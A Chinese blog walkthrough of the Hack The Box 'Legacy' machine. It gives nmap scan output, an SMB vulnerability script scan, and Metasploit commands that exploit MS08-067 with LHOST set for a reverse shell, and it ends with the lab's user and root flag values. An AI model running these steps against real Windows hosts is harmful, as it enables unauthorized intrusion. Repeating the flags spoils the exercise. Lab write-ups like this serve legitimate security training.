[Meachines] [Easy] Legacy nmap 漏洞扫描脚本深度发现+MS08-067

最新推荐文章于 2024-10-01 20:47:03 发布
最新推荐文章于 2024-10-01 20:47:03 发布
阅读量178 收藏 5
点赞数 2
分类专栏: HackTheBox 文章标签: 运维 安全
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/141472735
版权

信息收集

IP AddressOpening Ports
10.10.10.4TCP:135,139,445

$ nmap -p- 10.10.10.4 --min-rate 1000 -sC -sV -Pn

PORT      STATE    SERVICE      VERSION
135/tcp   open     msrpc        Microsoft Windows RPC
139/tcp   open     netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds Windows XP microsoft-ds
1715/tcp  filtered houdini-lm
2790/tcp  filtered plgproxy
3485/tcp  filtered celatalk
4181/tcp  filtered macbak
8317/tcp  filtered unknown
16417/tcp filtered unknown
35682/tcp filtered unknown
37634/tcp filtered unknown
59296/tcp filtered unknown
59458/tcp filtered unknown
62000/tcp filtered unknown
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2024-08-28T14:59:28+03:00
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:2b:f1 (VMware)
|_clock-skew: mean: 5d00h18m08s, deviation: 2h07m16s, median: 4d22h48m08s

nmap 漏洞扫描脚本深度发现 & MS08-067

$ nmap --script smb-vuln* -p 445 10.10.10.4

image.png

MS17-010 和 MS08-067似乎存在这个系统

$ msfconsole

msf6 > use exploit/windows/smb/ms08_067_netapi

msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST 10.10.16.24

msf6 exploit(windows/smb/ms08_067_netapi) > run

image-1.png

附录:

可以通过上传whoami.exe来执行用户名查询

image-3.png

image-2.png

User.txt

e69af0e4f443de7e36876fda4ec7644f

Root.txt

993442d258b0e0ec917cae9e695d5713

Мартин.
关注
专栏目录
群晖DS918+的7.1.0-42661引导镜像+系统安装包
06-30
1、支持uefi和legacy方式引导; 2、虚拟机版支持e1000、e1000e、virtio、vmxnet3虚拟网卡; 3、物理机版添加RTL 8168/8169/8125b、Intel 1G/10G主流网卡和LSI SAS3.0阵列卡驱动; 4、添加redpill-acpid模块; 5、...
群晖DS918+和DS3617xs的7.01-42218引导镜像+系统安装包
03-06
1、支持uefi和legacy方式引导; 2、添加e1000e、virtio、vmxnet3虚拟网卡驱动; 3、添加RTL 8125b网卡和Intel 10G的PCIE网卡驱动; 4、添加LSI SAS3.0阵列卡驱动。 DS3617xs_7.0.1-42218.img 1、目前仅支持legacy...
github渗透测试工具库
SwBack的博客
12-26 3800
渗透测试工具库,黑客工具,脚本,APT攻击,痕迹清除,
Github网络安全测试工具库
热门推荐
网络安全
08-30 6万+
(web应用扫描器,支持指纹识别,文件目录爆破,SQL / XSS / RFI等漏洞扫描,也可直接用于struts,ShellShock等扫描)(一款开源Poc调用框架,可轻松调用Pocsuite,Tangscan,Beebeeto,Knowsec老版本POC,可使用docker部署)(一款web应用漏洞扫描器,支持扫描反射型以及存储型xss,sql injection等漏洞,支持输出pdf报告)(快速识别WEB服务器类型,CMS类型,WAF类型,WHOIS信息,以及语言框架)
漏洞及练习平台
qq_37751425的博客
05-14 522
WebGoat漏洞练习环境 https://github.com/WebGoat/WebGoat https://github.com/WebGoat/WebGoat-Legacy Damn Vulnerable WebApplication(漏洞练习平台) https://github.com/RandomStorm/DVWA 数据库注入练习平台 https://github.com/Audi-1/sqli-labs 用node编写的漏洞练习平台,like OWASP Node Goat https://
漏洞及渗透练习平台
迷风小白
03-28 3867
漏洞及渗透练习平台: WebGoat漏洞练习环境 https://github.com/WebGoat/WebGoat https://github.com/WebGoat/WebGoat-Legacy Damn Vulnerable Web Application(漏洞练习平台) https://github.com/RandomStorm/DVWA 数据库注入练习平台 https://gi...
打破冷漠僵局文章_保持冷静并打破僵局-最佳
cumi7754的博客
08-11 630
打破冷漠僵局文章Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulating real world sc...
打破冷漠僵局文章_保持冷静并打破僵局-北极
08-18 495
打破冷漠僵局文章Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulating real world sc...
推箱子2-向右推!_保持冷静并砍箱子-哔
cumi7754的博客
08-11 451
推箱子2-向右推!Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulating real world s...
安卓游戏开发推箱子_保持冷静并砍箱子-开发
cumi7754的博客
08-11 496
打破冷漠僵局文章Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulating real world sc...
推箱子2-向右推!_保持冷静,砍箱子-me脚
08-11 428
推箱子2-向右推!Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulating real world s...
Unity3D的Generic和Legacy动画例子(C#脚本)-附件资源
03-05
Unity3D的Generic和Legacy动画例子(C#脚本)-附件资源
使用 Docker 构建 LLaMA-Factory 环境
最新发布
GDHBFTGGG的博客
10-01 859
使用 Docker 构建 LLaMA-Factory 环境可以简化依赖安装和环境配置。
vulnhub-DC-2靶机的测试报告
ccc_9wy的博客
09-27 726
基于渗透测试流程详细渗透dc-2靶机;获取所有的5个flag;bp爆破用户名和密码;rbash逃逸;git的sudo提权;wordpress;cluster bomb模式;弱口令
【大数据】大数据运维方案浅析总结
wnm23的专栏
09-27 957
流行的大数据运维管理,包括Cloudera的CDH和CDP、Hortonworks的HDP、Apache的Ambari、国产开源平台Datasophon,以及自动化运维工具Ansible和SaltStack。
Docker
m0_73939789的博客
10-01 883
Docker本身包含一个后台服务,我们可以利用Docker命令告诉Docker服务,帮助我们快速部署指定的应用。Docker服务部署应用时,首先要去搜索并下载应用对应的镜像,然后根据镜像创建并允许容器,应用就部署完成了。
Lab1:虚拟机kolla安装部署openstack,并创建实例
张嘉睿的博客
09-27 671
openstack S 版本 iso 链接:https://pan.baidu.com/s/1XJPm3OUUU716FzzBdc97nA。在 /etc/kolla 目录下会生成 admin-openrc.sh 文件,其中包含了登录所需要的用户名和密码信息。两个 host-only 的网络, 其中一个网络的地址段设置为 10.10.10.1/24。下载地址:http://download.cirros-cloud.net/下载内容:cirros-0.5.1-x86_64-disk.img。
nginx常用的性能优化
码云仓库地址:https://gitee.com/lance-gyq
09-26 1153
由于http是一个无状态协议,客户端向服务端发送一个请求,服务端响应完之后就会断开这个请求,如果客户端需要发送多个请求,这样会导致服务器与客户端会产生大量的连接和断开的操作,从而会增加服务器的性能开销,通过设置 keepalive_timeout参数可以告知nginx处理完一个请求之后,先保持一下这个连接,以便来再次的接收客户端发送的后续的请求,降低因频繁建立和断开连接所带来的性能消耗。然而,在某些性能要求较高的场景下(如实时应用),小延迟是可接受的,因而禁用此算法可以减少延迟,提高响应速度。
api-ms-win-core-kernel32-legacy-l1-1-2.dll
04-23
api-ms-win-core-kernel32-legacy-l1-1-2.dll是Windows操作系统中的一个动态链接库文件。它是Windows内核32位核心功能的一部分,提供了一系列用于处理系统核心功能的API函数。 这个DLL文件主要包含了一些旧版本的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值